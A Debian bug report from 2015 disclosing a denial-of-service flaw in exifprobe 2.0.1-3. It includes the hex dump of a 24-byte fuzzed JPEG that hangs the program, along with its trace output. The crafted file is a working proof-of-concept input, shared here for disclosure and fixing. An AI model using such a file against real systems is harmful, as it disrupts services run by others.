Bug#779527: exifprobe: denial of service
Henri Salo
henri at nerv.fi
Sun Mar 1 21:34:33 UTC 2015
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Package: exifprobe
Version: 2.0.1-3
Severity: important
Tags: security
Following attached sample file hangs exifprobe and uses all CPU from one core.
Sample file is fuzzed with american fuzzy lop <http://lcamtuf.coredump.cx/afl/>.
00000000 ff d8 ff e0 00 10 4a 46 49 46 4a 46 49 46 00 01 |......JFIFJFIF..|
00000010 00 01 00 00 ff ec 00 43 |.......C|
00000018
Starting program: exifprobe-2.0.1/exifprobe -c sample2.jpg
File Name = sample2.jpg
File Type = JPEG
File Size = 24
@000000000=0 : <JPEG_SOI>
@0x0000002=2 : <JPEG_APP0> 0xffe0 length 16, - (not dumped: use -A)
@0x0000013=19 : </JPEG_APP0>
@0x0000014=20 : <JPEG_APP12> 0xffec length 67, FAILED to read character at offset 24 (EOF)
- --
Henri Salo
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.12 (GNU/Linux)
iQIcBAEBAgAGBQJU84XpAAoJECet96ROqnV0MLsP/i08u5Ht82ElZlg9n0TdF23x
1G9Muhz93Pa78dxvE9FVh7mjFr9Qsp3WwXlEAXrK8uM+aVECZYDHe5RXDn5nGcGp
h2Z1bLXOZATJ7bPbJJ6WFCvKuh6NgAx/+E/sSY3CGe3yJl6CsBsV8a/DlqCuEUen
UibQuML64Yz0W6Q0AHnWmopsuqNZ49Sml6CBjSDPLqYeNQIVFCqwlucn3h8ENuox
L7ZdXh0xhaYqcKzaj550IbgbqBg1SiNbJqeEN0/HeHLPwA4Fk/U0zHSjPTvcrjLG
nTpLa+e9WBDw9BJOlFQj4U4/mz26HDc2iTaJ/sNmwDQZ5hJsvtjxADI6Jdp+LWc0
Ti9P/4gKrKuA2DEYfTGzL7lX8YQQ6HiVP3zWnJB64isGCP5dgcl5jL27QhmUyaeF
jtuP/ND+X0kBHjpkcv/hJArfk2+XfQKe8lcIGeJRX3DhwMD1oc5lq5g+2RoJHvZa
aJGxeZGWc6d3ObkpPbHqUX5NxqqsSVttMjETMfcBLAe7xq2n1PhyZZH1vU2aqdiQ
K89aW+HdKhJvvmixZ6DQzID9I9JdGn0/OWtKkBHQoazgGjOv0BgccDGX/fRYa9y0
4iHl0WLGeDk1B8dW2CzD13sqDAym/cDAyDUthLt5LpNOtrL3Cv/ykjyjC2b5UInS
klUsjJiVX6eqtMnindFu
=fiJn
-----END PGP SIGNATURE-----
More information about the forensics-devel
mailing list